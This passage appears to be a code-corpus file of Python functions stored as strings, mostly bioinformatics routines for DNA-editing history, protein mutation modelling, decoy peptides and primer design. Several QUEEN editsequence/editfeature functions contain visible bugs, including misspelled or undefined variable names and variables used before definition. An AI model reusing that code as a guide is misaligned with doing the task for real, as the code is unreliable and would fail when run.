source_sequence.parental_class == \"DNAFeature\":\n qkey = source_sequence.qkey\n for qindex, qfeat in enumerate(new_dna.__class__.queried_features_dict[qkey]):\n if qfeat._second_id == source_sequence.parental_id:\n break\n \n if type(source_sequence.item) == int:\n fsource = \"QUEEN.queried_features_dict['{}'][{}].{}[{}]\".format(qkey, qindex, \"seq\" , source_sequence.item)\n \n elif type(source_sequence.item) == slice:\n sl_start = source_sequence.item.start \n sl_stop = source_sequence.item.stop \n sl_step = source_seqeunce.item.step\n sl_start = \"\" if sl_start is None else sl_start\n sl_stop = \"\" if sl_stop is None else sl_stop\n if sl_step == 1 or sl_step == None:\n fsource = \"QUEEN.queried_features_dict['{}'][{}].seq[{}:{}]\".format(qkey, qindex, sl_start, sl_stop)\n else:\n fsource = \"QUEEN.queried_features_dict['{}'][{}].seq[{}:{}:{}]\".format(qkey, qindex, sl_start, sl_stop, sl_step)\n \n else:\n fsource = \"QUEEN.queried_features_dict['{}'][{}].seq\".format(qkey, qindex)\n history_features.append(source_sequence.parent.subject._history_feature) \n\n elif source_sequence.parental_class == \"QUEEN\": \n parental_id = source_sequence.parental_id\n if source_sequence.name != None: \n if \"printsequence\" in 
source_sequence.name:\n if len(source_sequence.name.split(\"_\")) == 2: \n seqname = \"QUEEN.dna_dict['{}'].printsequence(strand={})\".format(parental_id, source_sequence.name.split(\"_\")[-1]) \n else:\n seqname = \"QUEEN.dna_dict['{}'].printsequence(start={}, end={}, strand={})\".format(parental_id, *source_sequence.name.split(\"_\")[1:])\n elif source_sequence.name == \"rcseq\":\n seqname = \"QUEEN.dna_dict['{}'].rcseq\".format(parental_id) \n else:\n seqname = \"QUEEN.dna_dict['{}'].seq\".format(parental_id)\n \n if type(source_sequence.item) == int:\n fsource = \"{}[{}]\".format(seqname, source_sequence.item)\n \n elif type(source_sequence.item) == slice:\n sl_start = source_sequence.item.start\n sl_stop = source_sequence.item.stop \n sl_step = source_sequence.item.step\n sl_start = \"\" if sl_start is None else sl_start\n sl_stop = \"\" if sl_stop is None else sl_stop\n if sl_step == 1 or sl_step == None:\n fsource = \"{}[{}:{}]\".format(seqname, sl_start, sl_stop)\n else:\n fsource = \"{}[{}:{}:{}]\".format(seqname, sl_start, sl_stop, sl_step)\n else:\n fsource = \"{}\".format(seqname)\n history_features.append(source_sequence.parent._history_feature) \n \n elif source_sequence.parental_class == \"Cutsite\":\n if source_sequence.parent.name not in cs.defaultkeys:\n cs.new_cutsites.add((source_sequence.parent.name, source_origin.parent.cutsite)) \n fsource = \"cs.lib['{}'].{}\".format(source_sequence.parent.name, source_sequence.name)\n else:\n fsourcee = \"'{}'\".format(source_sequence) \n else:\n fsource = \"'{}'\".format(source_sequence)\n \n if quinable == True: \n source_sequence = repr(source_sequence) if source_sequence is not None else None\n destination_sequence = repr(destination_sequence) if destination_sequence is not None else None\n project = \"\" \n fproduct = \"\" if product is None else \", product='\" + product + \"'\"\n process_name = \"\" if process_name is None else \", process_name='\" + process_name + \"'\"\n process_description = \"\" if process_description is None else \", process_description='\" + process_description + \"'\" \n \n new_dna._product_id = new_dna._unique_id if product is None else product \n if start == 0 and end == len(dna.seq):\n building_history = \"QUEEN.dna_dict['{}'] = editsequence(QUEEN.dna_dict['{}'], source_sequence={}, destination_sequence={}, strand={}{}{}{}{})\".format(new_dna._product_id, original_id, fsource, destination_sequence, strand, project, fproduct, process_name, process_description)\n else: \n building_history = \"QUEEN.dna_dict['{}'] = editsequence(QUEEN.dna_dict['{}'], source_sequence={}, destination_sequence={}, start={}, end={}, strand={}{}{}{}{})\".format(new_dna._product_id, original_id, fsource, destination_sequence, start, end, strand, project, fproduct, process_name, process_description)\n if len(history_features) > 1:\n history_feature = _combine_history(new_dna, history_features) \n new_dna._history_feature = history_feature\n process_id, original_ids = make_processid(new_dna, building_history, process_id, original_ids)\n add_history(new_dna, [building_history, \"source: {}; destination: {}; start: {}; end: {}; strand: {}\".format(source_sequence, destination_sequence, start, end, strand), \",\".join([process_id] + original_ids)], _sourcefile) \n new_dna._check_uniqueness()\n if product is None:\n pass \n else:\n if _mode == \"edit\":\n product = product.replace(\" \",\"\")\n match = re.fullmatch(\"(.+)\\[(.+)\\]\", product) \n if match:\n if match.group(2).isdecimal() == True:\n 
new_dna.__class__._namespace[match.group(1)][int(match.group(2))] = new_dna\n else:\n new_dna.__class__._namespace[match.group(1)][match.group(2)] = new_dna\n else: \n new_dna.__class__._namespace[product] = new_dna\n else:\n pass \n if _mode == \"edit\":\n return new_dna\n else:\n return feature_list",
"def modifications(self, components=['model', 'sheets', 'projections']):\n mapping = {'model': [self],\n 'sheets':self.sheets,\n 'projections':self.projections}\n\n lines = []\n for component in components:\n heading = \"=\" * len(component)\n lines.extend([heading, component.capitalize(), heading, ''])\n specs = mapping[component]\n padding = max(len(str(spec)) for spec in specs)\n for spec in sorted(specs):\n modified = [str(el) for el in sorted(spec.modified_parameters)]\n lines.append(\"%s : [%s]\" % (str(spec).ljust(padding), \", \".join(modified)))\n lines.append('')\n print \"\\n\".join(lines)",
"def build_model_mutator(self):\n\n\t\tprint \"beginning mutation procedure\"\n\t\twith open(self.rootdir+self.template[0][0]+'.pdb','r') as fp: lines = fp.readlines()\n\t\t\n\t\tregex_seqres = '^SEQRES\\s+[0-9]+\\s+([A-Z])\\s+[0-9]+\\s+(.+)'\n\t\tregex_remark = '^REMARK\\s300\\s([A-Z]+)\\s+'\n\t\t#---if SEQRES is present we get the sequence from it\n\t\t#---note that the seqres protocol below should handle missing residues even if they exist\n\t\t#---...at the beginning of the target sequence\n\t\tif any([re.match(regex_seqres,line) for line in lines]):\n\t\t\tseqresli = [li for li,l in enumerate(lines) if re.match(regex_seqres,l)]\n\t\t\tseqraw = [re.findall(regex_seqres,lines[li])[0] for li in seqresli]\n\t\t\tsequence = ''.join([''.join([aacodemap[j] for j in i[1].split()]) \n\t\t\t\tfor i in seqraw if i[0] == self.template[0][1]])\n\t\t\tmissingli = [re.findall('^REMARK\\s+([0-9]+)\\sMISSING RESIDUES',l)[0] for li,l in enumerate(lines) \n\t\t\t\tif re.match('^REMARK\\s+([0-9]+)\\sMISSING RESIDUES',l)]\n\t\t\tif missingli != []:\n\t\t\t\tif len(missingli)>1: raise Exception('cannot parse multiple MISSING RESIDUE notes')\n\t\t\t\tmissingli = str(missingli[0])\n\t\t\t\tstartres = int([\n\t\t\t\t\tre.findall('^REMARK\\s+'+missingli+'\\s+[A-Z]{3}\\s+[A-Z]\\s+([0-9]+)',l)[0] \n\t\t\t\t\tfor li,l in enumerate(lines)\n\t\t\t\t\tif re.match('^REMARK\\s+'+missingli+'\\s+[A-Z]{3}\\s+[A-Z]\\s+[0-9]+',l)][0])\n\t\t\telse: startres = int([line for line in lines if re.match('^ATOM',line)][0][22:25+1])\n\t\telif any([re.match(regex_remark,line) for line in lines]):\n\t\t\tseqresli = [li for li,l in enumerate(lines) if re.match(regex_remark,l)]\n\t\t\tseqraw = [re.findall(regex_remark,lines[li])[0] for li in seqresli]\n\t\t\tsequence = ''.join(seqraw)\n\t\t\tstartres = int([line for line in lines if re.match('^ATOM',line)][0][22:25+1])\n\t\telse: raise Exception('need either REMARK 300 or SEQRES in your pdb file')\n\t\t\t\n\t\tself.target = []\n\t\tfor mi,mut in enumerate(self.settings['mutations']):\n\t\t\tsequence_mut = list(sequence)\n\t\t\tif sequence[mut[1]-startres] != mut[0]: \n\t\t\t\tmsg = [\n\t\t\t\t\t'USER ERROR!',\n\t\t\t\t\t'sequence: '+sequence,\n\t\t\t\t\t'starting residue number from ATOM record: '+str(startres),\n\t\t\t\t\t'expecting '+str(mut[0])+' at position '+str(mut[1]),\n\t\t\t\t\t'however reading '+str(sequence[mut[1]-startres])+' at that position!',\n\t\t\t\t\t]\n\t\t\t\traise Exception('\\n'.join(msg))\n\t\t\telse: sequence_mut[mut[1]-startres] = mut[2]\n\t\t\tsequence_mut = ''.join(sequence_mut)\n\t\t\tprint 'template sequence = '+sequence\n\t\t\tprint 'mutated sequence = '+sequence_mut\n\t\t\tself.target.append(['mutation'+str(mi),sequence_mut])\n\t\tfor mi,mut in enumerate(self.settings['mutations']):\n\t\t\tprint 'building homology model for mutation '+str(mi)\n\t\t\tself.settings['target_name'] = self.target[mi][0]\n\t\t\t#---we explicitly encode the mutation in the filename so that it can be retrieved later\n\t\t\t#---...particularly in ???\n\t\t\tbatchdir = 'model-v'+('%05d'%(mi))+'-'+self.template[0][0]+'_chain'+self.template[0][1]+\\\n\t\t\t\t'_mut'+''.join([str(j) for j in mut])+'/'\n\t\t\tself.build_model_single(batchdir_override=batchdir,startres=startres)",
"def kaggle_mutator(modified_content, values, document):\r\n is_abusive = 1 if (sum(document[attribute_mask]) > 0) else 0\r\n\r\n modified_document = [values[0], is_abusive] + values[1:] + [modified_content]\r\n return modified_document",
"def truncate(self, Ls=None, germs=None, prepStrs=None, effectStrs=None, seqs=None):\n Ls = self.Ls if (Ls is None) else Ls\n germs = self.germs if (germs is None) else germs\n prepStrs = self.prepStrs if (prepStrs is None) else prepStrs\n effectStrs = self.effectStrs if (effectStrs is None) else effectStrs\n cpy = LsGermsStructure(Ls, germs, prepStrs,\n effectStrs, self.aliases, self.sequenceRules)\n\n #OLD iPreps = [i for i, prepStr in enumerate(self.prepStrs) if prepStr in prepStrs]\n #OLD iEffects = [i for i, eStr in enumerate(self.effectStrs) if eStr in effectStrs]\n #OLD fidpairs = list(_itertools.product(iPreps, iEffects))\n all_fidpairs = list(_itertools.product(list(range(len(prepStrs))), list(range(len(effectStrs)))))\n\n for (L, germ), plaq in self._plaquettes.items():\n basestr = plaq.base\n if seqs is None:\n fidpairs = all_fidpairs\n else:\n fidpairs = []\n for i, j in all_fidpairs:\n if prepStrs[i] + basestr + effectStrs[j] in seqs:\n fidpairs.append((i, j))\n\n if (L in Ls) and (germ in germs):\n cpy.add_plaquette(basestr, L, germ, fidpairs)\n\n cpy.add_unindexed(self.unindexed) # preserve unindexed strings\n return cpy",
"def compute_one_patch(sess, experiment, output_fetches, inputs_1d,\n residue_index, prob_weights, batch, length, i, j,\n crop_size_x, crop_size_y):\n # Note that these are allowed to go off the end of the protein.\n end_x = i + crop_size_x\n end_y = j + crop_size_y\n crop_limits = np.array([[i, end_x, j, end_y]], dtype=np.int32)\n ic = max(0, i)\n jc = max(0, j)\n end_x_cropped = min(length, end_x)\n end_y_cropped = min(length, end_y)\n prepad_x = max(0, -i)\n prepad_y = max(0, -j)\n postpad_x = end_x - end_x_cropped\n postpad_y = end_y - end_y_cropped\n\n # Precrop the 2D features:\n inputs_2d = np.pad(batch['inputs_2d'][\n :, jc:end_y, ic:end_x, :],\n [[0, 0],\n [prepad_y, postpad_y],\n [prepad_x, postpad_x],\n [0, 0]], mode='constant')\n assert inputs_2d.shape[1] == crop_size_y\n assert inputs_2d.shape[2] == crop_size_x\n\n # Generate the corresponding crop, but it might be truncated.\n cxx = batch['inputs_2d'][:, ic:end_x, ic:end_x, :]\n cyy = batch['inputs_2d'][:, jc:end_y, jc:end_y, :]\n if cxx.shape[1] < inputs_2d.shape[1]:\n cxx = np.pad(cxx, [[0, 0],\n [prepad_x, max(0, i + crop_size_y - length)],\n [prepad_x, postpad_x],\n [0, 0]], mode='constant')\n assert cxx.shape[1] == crop_size_y\n assert cxx.shape[2] == crop_size_x\n if cyy.shape[2] < inputs_2d.shape[2]:\n cyy = np.pad(cyy, [[0, 0],\n [prepad_y, postpad_y],\n [prepad_y, max(0, j + crop_size_x - length)],\n [0, 0]], mode='constant')\n assert cyy.shape[1] == crop_size_y\n assert cyy.shape[2] == crop_size_x\n inputs_2d = np.concatenate([inputs_2d, cxx, cyy], 3)\n\n output_results = sess.run(output_fetches, feed_dict={\n experiment.inputs_1d_placeholder: inputs_1d,\n experiment.residue_index_placeholder: residue_index,\n experiment.inputs_2d_placeholder: inputs_2d,\n experiment.crop_placeholder: crop_limits,\n })\n # Crop out the \"live\" region of the probs.\n prob_patch = output_results['probs'][\n 0, prepad_y:crop_size_y - postpad_y,\n prepad_x:crop_size_x - postpad_x]\n weight_patch = prob_weights[prepad_y:crop_size_y - postpad_y,\n prepad_x:crop_size_x - postpad_x]\n patch = {'prob': prob_patch, 'weight': weight_patch}\n\n if 'softmax_probs' in output_results:\n patch['softmax'] = output_results['softmax_probs'][\n 0, prepad_y:crop_size_y - postpad_y,\n prepad_x:crop_size_x - postpad_x]\n if 'secstruct_probs' in output_results:\n patch['ss_x'] = output_results['secstruct_probs'][\n 0, prepad_x:crop_size_x - postpad_x]\n patch['ss_y'] = output_results['secstruct_probs'][\n 0, crop_size_x + prepad_y:crop_size_x + crop_size_y - postpad_y]\n if 'torsion_probs' in output_results:\n patch['torsions_x'] = output_results['torsion_probs'][\n 0, prepad_x:crop_size_x - postpad_x]\n patch['torsions_y'] = output_results['torsion_probs'][\n 0, crop_size_x + prepad_y:crop_size_x + crop_size_y - postpad_y]\n if 'asa_output' in output_results:\n patch['asa_x'] = output_results['asa_output'][\n 0, prepad_x:crop_size_x - postpad_x]\n patch['asa_y'] = output_results['asa_output'][\n 0, crop_size_x + prepad_y:crop_size_x + crop_size_y - postpad_y]\n return patch",
"def create_decoy_peprec(peprec, spec_id_prefix='decoy_', keep_cterm_aa=True, remove_redundancy=True, move_mods=True):\n\n def move_mods(row):\n mods = row['modifications']\n if type(mods) == str:\n if not mods == '-':\n mods = mods.split('|')\n mods = sorted(zip([int(p) if (p == '-1' or p == '0')\n else len(row['peptide']) - int(p)\n for p in mods[::2]\n ], mods[1::2]))\n mods = '|'.join(['|'.join([str(x) for x in mod]) for mod in mods])\n row['modifications'] = mods\n return row\n\n peprec_decoy = peprec.copy()\n peprec_decoy['spec_id'] = spec_id_prefix + peprec_decoy['spec_id'].astype(str)\n\n if keep_cterm_aa:\n peprec_decoy['peptide'] = peprec_decoy['peptide'].apply(lambda pep: pep[-2::-1] + pep[-1])\n else:\n peprec_decoy['peptide'] = peprec_decoy['peptide'].apply(lambda pep: pep[-1::-1])\n\n if remove_redundancy:\n peprec_decoy = peprec_decoy[~peprec_decoy['peptide'].isin(peprec['peptide'])]\n\n if 'protein_list' in peprec_decoy.columns:\n peprec_decoy['protein_list'] = 'decoy'\n\n if move_mods:\n peprec_decoy = peprec_decoy.apply(move_mods, axis=1)\n\n return peprec_decoy",
"def _apply_termini_modifications(graph, modifications):\n terminal_nodes = _find_terminal_nodes(graph)\n for modification in modifications:\n seq_ID, resname = modification.split(':')\n idx_nodes = find_atoms(graph, \"seqid\", int(seq_ID))\n for node in idx_nodes:\n if node in terminal_nodes:\n graph.nodes[node][\"resname\"] = resname",
"def MAP(cpts, obs, terms):\r\n\r\n # a list to store the computed probabilities\r\n all_sums = []\r\n # initialize all terms to false\r\n for value in range(len(terms)):\r\n terms[value] = [terms[value], '0']\r\n search_array = terms + obs\r\n # if all terms are being watched, just call MPE\r\n if len(search_array) == len(cpts):\r\n return MPE(cpts, obs)\r\n # we need to know what terms we aren't interested in so we start with \r\n # or terms and observations and note the variables that appear in CPT but\r\n # not in those\r\n dont_count = []\r\n for var in cpts:\r\n if [var[0], '0'] not in search_array and [var[0], '1'] not in search_array:\r\n dont_count.append(var[0])\r\n terms.append([var[0],'1'])\r\n # sort the terms to ensure correct ordering\r\n terms.sort()\r\n # creates a list of all possible bit strings\r\n # just an easy way to create all possible truth assignments\r\n seq = [\"\".join(seq) for seq in itertools.product(\"01\", repeat=len(terms))]\r\n # loop through all possible truth assignments\r\n for j in range(len(seq)):\r\n # we initialize at probability = 100%\r\n chance = 1\r\n # assign the truth values\r\n for k in range(len(seq[j])):\r\n terms[k][1] = seq[j][k]\r\n # this computes the probability using the chaining rule\r\n for i in range(len(terms)):\r\n new_terms = terms[:-i-1] + obs\r\n new_terms.sort()\r\n chance *= probability(cpts,terms[-i-1], new_terms)\r\n # add the probabilities to our list\r\n all_sums.append(chance)\r\n combine = []\r\n # note all variables which weren't in obs or Vs\r\n for i in dont_count:\r\n combine.append(terms.index([i,'1']))\r\n # this will store the final probabilities\r\n final_array = [0] * len(seq)\r\n # another complicated looking loop, it just serves to combine probabilities\r\n # for example, if we have a CPT with x_1, x_2, x_3, x_4 and we observe \r\n # x_1 to be true and have Vs = [x_3, x_4] then we need to combine the \r\n # probabilities that are the same except for x_2 = true vs false\r\n for loc in combine:\r\n for sequence in range(len(seq)):\r\n for alt_sequence in range(sequence+1,len(seq)):\r\n if (seq[sequence][:loc] + seq[sequence][loc+1:]) == (seq[alt_sequence][:loc] + seq[alt_sequence][loc+1:]):\r\n final_array[sequence] = all_sums[sequence] + all_sums[alt_sequence]\r\n\r\n # get the truth assignment for the highest probability\r\n location = seq[final_array.index(max(final_array))]\r\n truth_assignment = []\r\n # place the truth assignment in a more readable fashion\r\n for value in range(len(terms)):\r\n if terms[value] in search_array:\r\n if location[value] == '0':\r\n truth_assignment.append(terms[value][0]+ ' = False')\r\n else:\r\n truth_assignment.append(terms[value][0]+ ' = True')\r\n return (truth_assignment)",
"def convert_pmod(pmod):\n\n if pmod.args[0].value in belspec[\"bel1_migration\"][\"protein_modifications\"]:\n pmod.args[0].value = belspec[\"bel1_migration\"][\"protein_modifications\"][pmod.args[0].value]\n\n return pmod",
"def calculate_rxn_syst_pI(sequence, rxn_syst, cutoff_pi):\n modifications = define_seq_modifications()\n seq_obj = ProteinAnalysis(sequence)\n pi = seq_obj.isoelectric_point()\n modifier = '0'\n if pi < cutoff_pi:\n category = '0'\n else:\n category = '1'\n\n if category == '0':\n rxn_syst.seed_MOF = True\n rxn_syst.pI = pi\n\n # if the category is 1 - i.e. pi > cutoff\n # then we test modification\n elif category == '1':\n # report unmodified pI if modification isn't successful\n rxn_syst.pI = pi\n modifier = '1'\n # get modified pI\n seq = sequence\n # replace target amino acid residue\n # with replacement amino acid residue\n # one letter codes\n targ = convert_to_one_letter_code_sing(\n modifications[modifier]['target_res']\n )\n replacement = convert_to_one_letter_code_sing(\n modifications[modifier]['replace_res']\n )\n mod_seq = ''.join(seq).replace(targ, replacement)\n seq_obj = ProteinAnalysis(mod_seq)\n pi = seq_obj.isoelectric_point()\n if pi < cutoff_pi:\n category = '0'\n else:\n category = '1'\n\n if category == '0':\n rxn_syst.seed_MOF = True\n rxn_syst.req_mod = modifier\n rxn_syst.pI = pi\n else:\n rxn_syst.seed_MOF = False\n\n return rxn_syst",
"def genPrimerPairs_3Ext(primer_length=20, anneal_length=10, GC_low=40, GC_high=60):\n\n print('Primers for 3\\' extension half-asstemers')\n\n\n forwTemplate5_3 = GenOligoGC(primer_length,GC_low, GC_high)\n \"\"\"re.match checks if the first 2 Nuc are GC in the forward and backwards direction\"\"\"\n while not (re.match(\"[GC]{2}\",str(forwTemplate5_3)) and\n re.match(\"[GC]{2}\", str(forwTemplate5_3[::-1])) and\n re.match(\"[GC]{2}\", str(forwTemplate5_3[8:10]))):\n\n forwTemplate5_3 = GenOligoGC(primer_length,GC_low, GC_high)\n\n forwTemp3_5 = forwTemplate5_3[::-1]\n forwPrimer5_3 = forwTemp3_5.complement()\n print(f\"Template Seq 3\\' - > 5\\': {forwTemp3_5}\")\n print(f\"ForwPrimer Seq 5\\' - > 3\\': {forwPrimer5_3}\")\n\n forwPrimer_L10 = forwPrimer5_3[10:]\n print(f\"Last 10 Nucleotides of forward primer: {forwPrimer_L10}\")\n\n revPrimer_L10 = GenOligoGC(10,GC_low, GC_high)\n while not re.match(\"[GC]{2}\",str(revPrimer_L10[::-1])):\n revPrimer_L10 = GenOligoGC(10,GC_low, GC_high)\n\n \"\"\"First 10 Nuc of rev primer must be identical to last 10 Nuc of forward Primer\"\"\"\n revPrimer5_3 = forwPrimer_L10 + revPrimer_L10\n\n print(f\"RevPrimer Seq 5\\' - > 3\\': {revPrimer5_3}\")\n\n return forwPrimer5_3, revPrimer5_3",
"def editfeature(dna, key_attribute=\"all\", query=\".+\", source=None, start=0, end=None, strand=2, target_attribute=None, operation=None, new_copy=True, \n product=None, process_name=None, process_description=None, pn=None, pd=None, quinable=None, **kwargs):\n kwargs.setdefault(\"_sourcefile\", None) \n kwargs.setdefault(\"process_id\", None)\n kwargs.setdefault(\"original_ids\", []) \n _sourcefile = kwargs[\"_sourcefile\"] \n process_id = kwargs[\"process_id\"] \n original_ids = kwargs[\"original_ids\"]\n\n project = None\n project = project if product is None else product\n process_name = pn if process_name is None else process_name\n process_description = pd if process_description is None else process_description\n if quinable is None:\n if target_attribute == \"sequence\":\n quinable = True\n else:\n quinable = False\n\n if new_copy == False or quinable == False:\n pass \n else:\n original_id = dna._product_id\n dna = copy.deepcopy(dna) \n\n end = len(dna.seq) if end is None else end\n feature_list = dna.dnafeatures if source is None else source\n \n new_source = [] \n if start > end:\n for feat in feature_list:\n if start <= feat.start <= len(dna.seq) and 0 <= feat.end <= end and (feat.strand == strand or strand == 2): \n new_source.append(feat) \n else:\n for feat in feature_list:\n if start <= feat.start <= end and (feat.strand == strand or strand == 2): \n new_source.append(feat) \n\n feat_list = _search(dna, new_source, query, attribute=key_attribute) \n if operation is None or target_attribute is None:\n return feat_list\n \n elif operation.func.__name__ in (\"_createattribute\", \"_removeattribute\", \"_replaceattribute\"):\n for i, feat in enumerate(feat_list):\n feat._tmpid = i \n \n dna = operation(dna=dna, feat_list=feat_list, target_attribute=target_attribute)\n largs = [] \n for item in operation.keywords.items():\n item = list(item) \n if type(item[1]) is str:\n item[1] = repr(item[1]) \n #\"'\" + item[1] + \"'\"\n else:\n item[1] = str(item[1]) \n largs.append(\"=\".join(item)) \n command = operation.func.__name__[1:] + \"(\" + \",\".join(largs) + \")\"\n \n if type(query) == dna.seq.__class__:\n if query.parental_class == \"DNAFeature\":\n qkey = left_origin.qkey\n for qindex, qfeat in enumerate(dna.__class__.queried_features_dict[qkey]):\n if qfeat._second_id == query.parental_id:\n break\n if type(query.item) == int:\n fquery = \"QUEEN.queried_features_dict['{}'][{}].{}[{}]\".format(qkey, qindex, \"seq\" , query.item)\n elif type(query.item) == slice:\n sl_start = query.item.start\n sl_stop = query.item.stop \n sl_step = query.item.step\n sl_start = \"\" if sl_start is None else sl_start\n sl_stop = \"\" if sl_stop is None else sl_stop\n if sl_step == 1 or sl_step == None:\n fquery = \"QUEEN.queried_features_dict['{}'][{}].seq[{}:{}]\".format(qkey, qindex, sl_start, sl_stop)\n else:\n fquery = \"QUEEN.queried_features_dict['{}'][{}].seq[{}:{}:{}]\".format(qkey, qindex, sl_start, sl_stop, sl_step)\n else:\n fquery = \"QUEEN.queried_features_dict['{}'][{}].seq\".format(qkey, qindex)\n history_features.append(query.parent.subject._history_feature) \n \n elif query.parental_class == \"QUEEN\": \n parental_id = query.parental_id \n if query.name != None: \n if \"printsequence\" in query.name:\n if len(query.name.split(\"_\")) == 2: \n seqname = \"QUEEN.dna_dict['{}'].printsequence(strand={})\".format(parental_id, query.name.split(\"_\")[-1]) \n else:\n seqname = \"QUEEN.dna_dict['{}'].printsequence(start={}, end={}, strand={})\".format(parental_id, 
*query.name.split(\"_\")[1:])\n elif query.name == \"rcseq\":\n seqname = \"QUEEN.dna_dict['{}'].rcseq\".format(parental_id) \n else:\n seqname = \"QUEEN.dna_dict['{}'].seq\".format(parental_id)\n if type(query.item) == int:\n args.append(\"QUEEN.dna_dict['{}'].seq[{}]\".format(parental_id, query.item))\n elif type(query.item) == slice:\n sl_start = query.item.start\n sl_stop = query.item.stop \n sl_step = query.item.step\n sl_start = \"\" if sl_start is None else sl_start\n sl_stop = \"\" if sl_stop is None else sl_stop\n if sl_step == 1 or sl_step == None:\n fquery = \"{}[{}:{}]\".format(seqname, sl_start, sl_stop)\n else:\n fquery = \"{}[{}:{}:{}]\".format(seqname, sl_start, sl_stop, sl_step)\n else:\n fquery = \"{}\".format(seqname)\n history_features.append(query.parent._history_feature) \n \n elif query.parental_class == \"Cutsite\":\n if query.parent.name not in cs.defaultkeys:\n cs.new_cutsites.append((query.parent.name, query.parent.cutsite)) \n fquery = \"cs.lib['{}'].{}\".format(qorigin.parent.name, qorigin.name) \n else:\n fquery = \"{}\".format(repr(query)) \n\n else:\n fquery = \"{}\".format(repr(query)) \n \n if source is not None:\n qkeys = set([]) \n for feat in source:\n if \"_qkey\" in feat.__dict__:\n qkeys.add(feat._qkey)\n \n if len(set(qkeys)) == 1:\n source = \"QUEEN.queried_features_dict['{}']\".format(list(qkeys)[0])\n else:\n pass \n\n if project is None:\n pass\n else:\n dna._unique_id = project\n \n if new_copy == True and quinable == True:\n project = \"\" #if project is None else \", project='\" + project + \"'\"\n fproduct = \"\" if product is None else \", product='\" + product + \"'\"\n process_name = \"\" if process_name is None else \", process_name='\" + process_name + \"'\"\n process_description = \"\" if process_description is None else \", process_description='\" + process_description + \"'\" \n dna._product_id = dna._unique_id if product is None else product \n if start == 0 and end == len(dna.seq):\n args = [key_attribute, fquery, source, strand, target_attribute, command, new_copy]\n for i in range(len(args)):\n if type(args[i]) is str and i != 5 and i != 1:\n args[i] = \"'\" + args[i] + \"'\" \n building_history = \"QUEEN.dna_dict['{}'] = editfeature(QUEEN.dna_dict['{}'], key_attribute={}, query={}, source={}, strand={}, target_attribute={}, operation={}, new_copy={}{}{}{}{})\".format(dna._product_id, original_id, *args, project, fproduct, process_name, process_description) \n \n else:\n args = [key_attribute, fquery, source, start, end, strand, target_attribute, command, new_copy]\n for i in range(len(args)):\n if type(args[i]) is str and i != 7 and i != 1:\n args[i] = \"'\" + args[i] + \"'\" \n building_history = \"QUEEN.dna_dict['{}'] = editfeature(QUEEN.dna_dict['{}'], key_attribute={}, query={}, source={}, start={}, end={}, strand={}, target_attribute={}, operation={}, new_copy={}{}{}{}{})\".format(dna._product_id, original_id, *args, project, fproduct, project, process_name, process_description) \n \n process_id, original_ids = make_processid(dna, building_history, process_id, original_ids)\n add_history(dna, [building_history, \"key_attribute: {}; query: {}; start: {}; end: {}; strand: {}; target_attribute: {}; operation: {}\".format(key_attribute, fquery, start, end, strand, target_attribute, command), process_id, \",\".join([process_id] + original_ids)], _sourcefile)\n dna._check_uniqueness()\n if product is None:\n pass \n else:\n dna._product_id = product \n match = re.fullmatch(\"(.+)\\[(.+)\\]\", product)\n if match:\n if 
match.group(2).isdecimal() == True:\n dna.__class__._namespace[match.group(1)][int(match.group(2))] = dna\n else:\n dna.__class__._namespace[match.group(1)][match.group(2)] = dna\n else: \n dna.__class__._namespace[product] = dna\n\n elif new_copy == False or quinable == False:\n project = \"\" if project is None else \", project='\" + project + \"'\"\n fproduct = \"\" if product is None else \", product='\" + product + \"'\"\n process_name = \"\" if process_name is None else \", process_name='\" + process_name + \"'\"\n process_description = \"\" if process_description is None else \", process_description='\" + process_description + \"'\" \n args = [key_attribute, fquery, source, start, end, strand, target_attribute, command, new_copy]\n for i in range(len(args)):\n if type(args[i]) is str and i != 7 and i != 1:\n args[i] = \"'\" + args[i] + \"'\" \n building_history = \"editfeature(QUEEN.dna_dict['{}'], key_attribute={}, query={}, source={}, start={}, end={}, strand={}, target_attribute={}, operation={}, new_copy={}{}{}{}{})\".format(dna._unique_id, *args, project, fproduct, process_name, process_description)\n \n else:\n raise ValueError(\"'operation' can take only one of 'createattribute,' 'removeattribute,' and 'replaceattribute.'\")\n\n if new_copy == True:\n return dna",
"def getCodonSeqs(self):\r\n combinations = list(self.codonTable[aa] for aa in self.peptide) # creates a list of possible codons based on AA\r\n self.allPepSeqs = list(''.join(codon) for codon in itertools.product(*combinations)) # creates list of peptides\r\n return",
"def delta_prob_raw(variants, tx, clf1, clf2, model='cterm', is_sum=True):\n # fetch c-terminal sequence\n term_seq = [] ; vars_considered = []\n for v in variants:\n if v.mutant_protein_sequence:\n if model=='cterm' and type(v) in utils.indels+utils.nmd_sub_vars:\n term_seq.append(utils.fetch_seq(v.mutant_protein_sequence, model=model))\n if not is_sum: vars_considered.append(v)\n elif type(v) in utils.base_substitutions:\n if model=='cterm' and v.aa_mutation_start_offset>(len(v.transcript.protein_sequence) - 23):\n term_seq.append(utils.fetch_seq(v.mutant_protein_sequence, model=model))\n if not is_sum: vars_considered.append(v)\n elif model=='nterm' and v.aa_mutation_start_offset<=24:\n term_seq.append(utils.fetch_seq(v.mutant_protein_sequence, model=model))\n if not is_sum: vars_considered.append(v)\n\n # return None if no variants\n if not term_seq:\n if is_sum: return 0\n else: return [], [], []\n # return None if U in protein sequence\n if 'U' in utils.fetch_seq(tx.protein_sequence, model=model):\n if is_sum: return 0\n else: return [], [], []\n\n # construct dataframe\n result_df = pd.DataFrame({'seq': term_seq})\n\n # create feature matrix\n X = compute_feature_matrix(result_df['seq'], 6, dinuc=True, model=model)\n X2 = compute_feature_matrix(result_df['seq'], 0, dinuc=False, model=model)\n\n # predict scores\n result_df['prob'] = clf1.predict_proba(X)[:, 0]\n\n # adjust for baseline score\n wt_seq = utils.fetch_seq(tx.protein_sequence, model=model)\n wt_df = pd.DataFrame({'seq': [wt_seq]})\n # create feature matrix\n X = compute_feature_matrix(wt_df['seq'], 6, dinuc=True, model=model)\n wt_df['prob'] = clf1.predict_proba(X)[:, 0]\n baseline = wt_df['prob'].iloc[0]\n\n # add up scores\n tmp = result_df['prob'] - baseline\n if is_sum:\n prob_sum = tmp.sum()\n return prob_sum\n else:\n return vars_considered, tmp, result_df['prob']",
